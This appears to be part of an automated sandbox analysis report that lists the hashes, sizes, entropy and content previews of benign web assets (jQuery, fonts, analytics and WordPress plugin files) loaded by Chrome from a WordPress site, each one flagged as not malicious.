                                                                                                          SSDEEP:6144:6m4Y9f1jov6h+gyMiwqSXHzcPNqWzX4/COUuk3:aYHjoFgOSYs4O8
                                                                                                          MD5:8E295C17B44D3ECF748F40C7230A94D8
                                                                                                          SHA1:02E3E11C64D31C14EB21249CD0A0B5FC1DCC0026
                                                                                                          SHA-256:09E0BC14308F9CB7B772418A37E142F5A20A5586EFCE5715CEF001C32F687FF9
                                                                                                          SHA-512:6B2A4DD7520C4780FC09AE5FBE817E5423FECC5F537B4F247AD5B782150BD3B3546E7CFD6FA1D05680516F70C847E94CE104DE4EE3F3ECB29501B2646836E027
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-6@4x-768x768.png
                                                                                                          Preview:.PNG........IHDR.............._.....pHYs..........+......PLTE...&.....;....................4"....R@; ..-%'...$.!+..................................................................................................7A49C6?I<5>24<1...08-...2:/=F;......;C:6>58A7AK>......;F8..................6+.......................kmmDNBnqqtxx......ruq...nqm~..........MNK...hji.................fhg...GQEw{|...WYVZ\Ybdb|.}+2'TUS......QRO...egd...]_\quuHIG.........._a`.................KUJ.........}.....kmh............PZO...............w{w.........'-#... ........T`T...y~....DFA....... .......".....Zf[@A>...<=81,.!'.vxrH<@( #...-))885+$'!..F66z}y_mb(..0#"7.1%.....330...>8<3'(SBBS>9&%"`QT...8*+...I3+%..:27P91SGL^IDdsi9& iyq>13...2 .......{..n\[u..o.y...,.....@/,>*$...nNE.....~id........i<5..........TLE-$....`][*$..~.so.......yp........s.....tRNS...................'... .IDATx..Y=o.H.6.".b..F..HC...-..... .Z.]....<.`..L..y.q"...R,D+.B.c....>SX#.m @...w.1.R....../.(.y..y'[?.z..j..t..../0.'}.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):47993
                                                                                                          Entropy (8bit):5.4930700302465745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:yB8BAB9BIBDBjB2uzFRpi0MerX/+FEFTHvQldVoCYUvaROcGviVHBBBdBmB0BcBg:oQ
                                                                                                          MD5:BE3561ADBA36B2681F9AD92C01385394
                                                                                                          SHA1:016B3E73A31E92698F303F7F08CEB03FB8262548
                                                                                                          SHA-256:F4718500601A7B328143C06DD7FE07FE7546253DCD7CEB5A6CF8105EEB52474E
                                                                                                          SHA-512:570A8FA0EADE36E4CD840AC46B7584128069B332CBFCDBCC2247A0BAA7486C284F1948C5171935A95CF9C7B13EDA53914B6A2F368B513DC2602679D000486FC5
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzMdL_nz.woff2) format('woff2');. unicod
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56276
                                                                                                          Entropy (8bit):7.996360468628255
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+ZRPBfAX1Bbq9fWutLreBsswqxl+o19vCl0yo5q4RqJ0W9waeus9Xqkugf:2RZAWPLSBsTinbVWOaeVYK
                                                                                                          MD5:7A5A0964CB47152346115D149138D641
                                                                                                          SHA1:491238B93FFC40569FC868CAACFE1845B7B1A801
                                                                                                          SHA-256:02DF25A49D5B76E0C3B36D448EA9E3E1E0B5D0B942DBB02E5313FFC09A157727
                                                                                                          SHA-512:E01FA4EB7BCF1DFCBA396255B6CE044A4F7C5B43B72066C28C8D5077B5A1AD60BD0BFF8EA953096614D121149E4D2AEEB5EE49058760A34ECE9515893836EC2E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:S.xS.e.C..h.Q...7.`. `...G.ts.@w.@\.z............}#..F`..N2.}H.-V.,.m#<#..U.5..k ./V)..;O.A/C.Y..w_.wE..?^|x..J.O;.Q(.'...Dr."8S.%l?.5j.<...5s|.9...:d.....M../v..\.~..........a!Gf.!.,.5j.M).=..-._....M.wu....?...-..F......I..i.NI......qkd.t...~.......S../K...Q...80`.s\v.....w.^.{..m.A;.Ll....`..,....Vk....GiC.bMXu..<.K2.I.W.O..w.5.^z.>.......b.eA..Rm.m.1r1"w\$..?Ms...:._D....{..C\.%8OH.C..../U..SI.........&o..QJN.,3...P.....h...R.?]-l.v+.G.YI..8....AC..<.h.C...v........sOxt.e%u...2..k....R....}]~_......$Y.m<../...$!..6|..7...O..LK..)s...$h..,....|y2..=.....vc.H.cB9=. i..u..g....ym...Z..3?@...fy.q.......2...b.....0.R..D.d.II.$E..........f .T. ..Ie.\...>J.6.Ym...U[..3[..0......f....[ku....]...R*%n....2'.Y....A.(6...x$t?..,P.U..6.r~.6..@.%..OY.e......J....B."......}.....I..B....k.Vr....9K..!.(.6...1M.Z.....2.1..){...................(.R.......C@....r.....v....C.-.5.*u*.....;Q.:....g..?b.$rh."^..3..Q.......M.&(..v....V.....S..N's.O..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):87553
                                                                                                          Entropy (8bit):5.262620498676155
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                          MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                          SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                          SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                          SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                          Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1668)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1834
                                                                                                          Entropy (8bit):5.438090839180011
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MVV/bOd+rBLmYaQXfyso2N8wBALiVkJI9H+oWU/Anzze6ibkcun2GZWkY5cQXBv3:EKQr3ys3DAL/I9ezpFiYefXdKik44Mz
                                                                                                          MD5:D0A6D8547C66B0D7B0172466558D1208
                                                                                                          SHA1:FF93916519C7B9483251F609E4D29F38C30A66E3
                                                                                                          SHA-256:3B1384FF918D4B7F95F9EE5C8FC388203DEDFF7344D3D96598C9562162788612
                                                                                                          SHA-512:48BB25B08BFCC9944CD1FC3BD039EA41D1A870F488971839F2891B91710F3FF9EB0B523AA7AB888BF9968BBBCA41A48761405ABBAFC6C6D24927C078049545B8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * JavaScript Cookie v2.1.4. * https://github.com/js-cookie/js-cookie. *. * Copyright 2006, 2015 Klaus Hartl & Fagner Brack. * Released under the MIT license. */.!function(e){var n,o,t=!1;"function"==typeof define&&define.amd&&(define(e),t=!0),"object"==typeof exports&&(module.exports=e(),t=!0),t||(n=window.Cookies,(o=window.Cookies=e()).noConflict=function(){return window.Cookies=n,o})}(function(){function m(){for(var e=0,n={};e<arguments.length;e++){var o,t=arguments[e];for(o in t)n[o]=t[o]}return n}return function e(C){function g(e,n,o){var t,r;if("undefined"!=typeof document){if(1<arguments.length){"number"==typeof(o=m({path:"/"},g.defaults,o)).expires&&((r=new Date).setMilliseconds(r.getMilliseconds()+864e5*o.expires),o.expires=r),o.expires=o.expires?o.expires.toUTCString():"";try{t=JSON.stringify(n),/^[\{\[]/.test(t)&&(n=t)}catch(l){}n=C.write?C.write(n,e):encodeURIComponent(String(n)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),e=(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3835)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):306894
                                                                                                          Entropy (8bit):5.579414391598935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X5NGUiz8zQ9iZD9Wy9nnQyDy4gElQD4xgeb:X5uzCQqD5PYW
                                                                                                          MD5:B5A6FC0A939A7D68A63EC3AA883873CE
                                                                                                          SHA1:8B9972D439E7DD505ECF0D16F7D48AC1B1BC7182
                                                                                                          SHA-256:BE9A5E3335060D55365950254B43EC731C76805A1149C4D6DFBB49EE56EBCFEE
                                                                                                          SHA-512:B583F03A8B65353C9E5EA2646F4FBCC4B7806BB4BD673CBF7E690298E68463C8BA635B786136EB14BB057F4B4C3207EE807E36255BC9BFB5CCFE13D49529F425
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-2LEWGZ9NK3
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14238)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14277
                                                                                                          Entropy (8bit):5.115717878518809
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:BeAjA6wA9CrSX4cR8C8WwJMg35LI1S6SC8lwE5nYJe3VW+V3QMoF7ehetdQPR+SN:BeAjA6wA9CrSX4cR8+8Mc5LI1/SC8lw6
                                                                                                          MD5:2D4C5681F3A523F916C94C669F34F8A9
                                                                                                          SHA1:2E9E6B41841915BE50F08B6985FF60F8725906A0
                                                                                                          SHA-256:F63F130E6C972C9C2A733C0C9BE0BE21F1A532E323600F9C7608CB96BE30C360
                                                                                                          SHA-512:B99DD774B3B39FF2FE3E499B62DD2CA38EB5369181C2F031468A52801CCE94A680738C3A20F65B4E546434E38DEDA68142EF917A7A158602ABFF46694B68024E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.default=e.exports,e.exports.__esModule=!0},381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (456)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):648
                                                                                                          Entropy (8bit):5.172228476388626
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:UOpnXGf7y3RbdLhPb/f7ysKIUMbH4J4J5XNyURMJIvfgq3r:NpnX1NhbmSH4J4cvJKft3r
                                                                                                          MD5:64E76CBD1EDB9629EDDC537E047CD84C
                                                                                                          SHA1:A8F8760FCE644F93E5D78B263CE08EAB0DCD1473
                                                                                                          SHA-256:EF0DB6421B0C850DC9B41F38B68B1AAA961719E9C95A160E7F763B0A3BE03419
                                                                                                          SHA-512:A8592DE8473A7A7941455AF182120ADC3FDF2F3B992372C6197E5497741BE43FFCBE9B892D563C264D7A27F043E4B4E7D9A01F6BFC231168329A0B83CF1C58FB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Effects Highlight 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(t){"use strict";return t.effects.define("highlight","show",function(e,n){var o=t(this),i={backgroundColor:o.css("backgroundColor")};"hide"===e.mode&&(i.opacity=0),t.effects.saveStyle(o),o.css({backgroundImage:"none",backgroundColor:e.color||"#ffff99"}).animate(i,{queue:!1,duration:e.duration,easing:e.easing,complete:n})})});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11
                                                                                                          Entropy (8bit):3.2776134368191165
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:LUQ9:LUA
                                                                                                          MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                                                          SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                                                          SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                                                          SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:Bad Request
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5292
                                                                                                          Entropy (8bit):4.949846799231143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9/fm3FCn4F47KHkrsWygkKsVn2kSswkbsj5S0E2zrB:9/OFC4F47+krsWygkKsVn2kSswkbsj5b
                                                                                                          MD5:D83CE3C5DC1AEF20FB38F1162082E4A1
                                                                                                          SHA1:9DDD1D93FC1E72EDB42537EF9565085C67E4F7D1
                                                                                                          SHA-256:C62BD88E57893D6E5827CD8A882BC7B1800A7A57DDBE5749137A7D216C67F0B9
                                                                                                          SHA-512:0DE01A79C7331C44D227E035CDC6A5ED3D25FE709BBB75EE94264202C413AD3A6BB7AB12021A197C514A82F054037EDDA3286933477321889C1063BB0B5A3A28
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.9
                                                                                                          Preview:.c-offcanvas, .c-offcanvas-content-wrap {. transform: translate3d(0, 0, 0);. -webkit-backface-visibility: hidden;. backface-visibility: hidden;.}...c-offcanvas-bg.c-offcanvas-bg--push, .c-offcanvas-bg.c-offcanvas-bg--reveal, .c-offcanvas-content-wrap, .c-offcanvas {. transition: transform 300ms cubic-bezier(0.4, 0, 0.6, 1);.}...c-offcanvas.is-open {. transform: translate3d(0, 0, 0);. visibility: visible;. opacity: 1;.}../**. * Offcanvas-content-wrap.*/..c-offcanvas-content-wrap {. position: relative;. z-index: 3;. overflow: hidden;.}../**. * Offcanvas Panel.*/..c-offcanvas {. position: fixed;. min-height: 100%;. max-height: none;. top: 0;. display: block;. background: #fff;. overflow: hidden;.}..c-offcanvas--opening {. transition-timing-function: cubic-bezier(0.4, 0, 0.6, 1);.}..c-offcanvas.is-closed {. max-height: 100%;. overflow: hidden;. visibility: hidden;. box-shadow: none;. opacity: 0;. z-index: -1;.}...c-offcanvas.is-scrollable {. overflow-y: auto;.}..c-
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (572)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):226005
                                                                                                          Entropy (8bit):5.484111073245769
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:gydAd/2OH4cC/bAI9gZ/lK3qVjHSVABmvgsdtP+id:gydwuTAIaZ/M3KLSVABodh+u
                                                                                                          MD5:185B1E23373603D639FB2116758CC4C7
                                                                                                          SHA1:E9E95055B654A96946AB2899FC24CA813DE83885
                                                                                                          SHA-256:323B2A37D46054AA64A27AB91DB0B6D6C25BFBA00DA526291BF3B7FF2B6FA016
                                                                                                          SHA-512:8CD6344626C91B1D818B2E4672AA9665876DB5B3D7D60EE81F70840B598F701E1E6EDAAC9299F9DDEB9204F12BF3DF7B5CE5C21F96739F10B5065EC553AFFC88
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://mc.yandex.ru/metrika/tag.js
                                                                                                          Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function t(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Oa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Oa(t(ba))}.var Lf="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Mf;if("function"==typeof Object.setPrototypeOf)Mf=Object.setPrototypeOf;else{var Jh;a:{var Kh={a:!0},Lh={};try{Lh.__proto__=Kh;Jh=Lh.a;break a}catch(ba){}Jh=!1}Mf=Jh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Cm=Mf;.function Dm(ba,ta){ba.prototype=Lf(ta.prototype);ba.prototype.constructor=ba;if(Cm)Cm(ba,ta);else for(var $a in ta)if("p
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (17809), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):17809
                                                                                                          Entropy (8bit):4.729799310947723
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:p3sXkEzOm9Oq/tThyIeGe0cGAYBi2SpSgsVY8s:xGAYML
                                                                                                          MD5:1DDF23FCFD1B2941C456CE01DA8180A6
                                                                                                          SHA1:156EF5CC77061010E3F4123A47FA415C6391E5FF
                                                                                                          SHA-256:DD18A408A35AA5D393458657EB24FB56AB754ECE3F88BD78A038E5793D3F6991
                                                                                                          SHA-512:0FF8336A2AC3C3CE74D60E41291C7E14E365479DBB30D16CF3765847C0AD208175DD73D3301BF455867612963C0D8C67B32CBE1255C7999A23B16ECCD6B8CDA7
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=6.6.1
                                                                                                          Preview::root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}.woocommerce .woocommerce-error .button,.woocommerce .woocommerce-info .button,.woocommerce .woocommerce-message .button,.woocommerce-page .woocommerce-error .button,.woocommerce-page .woocommerce-info .button,.woocommerce-page .woocommerce-message .button{float:right}.woocommerce .col2-set,.woocommerce-page .col2-set{width:100%}.woocommerce .col2-set::after,.woocommerce .col2-set::before,.woocommerce-page .col2-set::after,.woocommerce-page .col2-set::before{content:" ";display:table}.woocommerce .col2-set::after,.woocommerce-page .col2-set::after{clear:both}.woocommerce .col2-set .col-1,.woocommerce-page .col2-set .col-1{float:left;width:48%}.woocommerce .col2-set .col-2,.woocommerce-page .col2-set .col-2
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18160
                                                                                                          Entropy (8bit):7.9507935414647015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                          MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                          SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                          SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                          SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
                                                                                                          Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3129)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13536
                                                                                                          Entropy (8bit):5.297596259710546
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPzCvSMaV0ZATrR09wMmQZcNt3FaWHd0XS0ZgxKuZwQ9PdDmfFVxZ4HQlbzk:FzCKMPZATN09o0mtVaYdvndDsr2
                                                                                                          MD5:3B9506442F5E9DA937159EC8E978AC92
                                                                                                          SHA1:A065A287369571ADF621A0BE14BB31B2BCEF194C
                                                                                                          SHA-256:B9BDD9C21F6B831230A5EDCD3C073F310BC4C518097ADB15FC50BD25E3343E2B
                                                                                                          SHA-512:630DED7A1FC798BA19516F2E66DC58D37364EC14501B6C24B5B7DF085DB4B7B86DB1C9EC1740C1D375027E59B7D2F9A00BF960F0E630D034221E1B3388CDDBFF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/gtranslate/js/base.js?ver=6.7.1
                                                                                                          Preview:(function(){. var gt = window.gtranslateSettings || {};. gt = gt[document.currentScript.getAttribute('data-gt-widget-id')] || gt;.. var lang_array_english = {"af":"Afrikaans","sq":"Albanian","am":"Amharic","ar":"Arabic","hy":"Armenian","az":"Azerbaijani","eu":"Basque","be":"Belarusian","bn":"Bengali","bs":"Bosnian","bg":"Bulgarian","ca":"Catalan","ceb":"Cebuano","ny":"Chichewa","zh-CN":"Chinese (Simplified)","zh-TW":"Chinese (Traditional)","co":"Corsican","hr":"Croatian","cs":"Czech","da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto","et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French","fy":"Frisian","gl":"Galician","ka":"Georgian","de":"German","el":"Greek","gu":"Gujarati","ht":"Haitian Creole","ha":"Hausa","haw":"Hawaiian","iw":"Hebrew","hi":"Hindi","hmn":"Hmong","hu":"Hungarian","is":"Icelandic","ig":"Igbo","id":"Indonesian","ga":"Irish","it":"Italian","ja":"Japanese","jw":"Javanese","kn":"Kannada","kk":"Kazakh","km":"Khmer","ko":"Korean","ku":"Kurdish (Kurm
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (347)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23719
                                                                                                          Entropy (8bit):3.994925954278077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vsonkuvDiU0xpzyNqcN2zt3N2HpNNEecpwFYyo822eyKZsgtbUNeHpNNELtOYhk7:vsonkuvDiU0xpzyNqcNUNwwwFYyo822I
                                                                                                          MD5:0A718D8ABA22F4B5D22F4346D970120C
                                                                                                          SHA1:5DCB8B3D770A2E924EFF24B5E8E867ABAD71665F
                                                                                                          SHA-256:3D19428D15E940E1DDB3A686D343B93CACF131DBC995309FB0648426812A9A5F
                                                                                                          SHA-512:F4CB61FD5D5F298D42F96B508121BFA73E440AC5B67FAC190D19E856EB9D91A182B94B2AAB3E974BD74B1F393F45D06D477D0B100AEA3233B3AC69B2B92898A9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
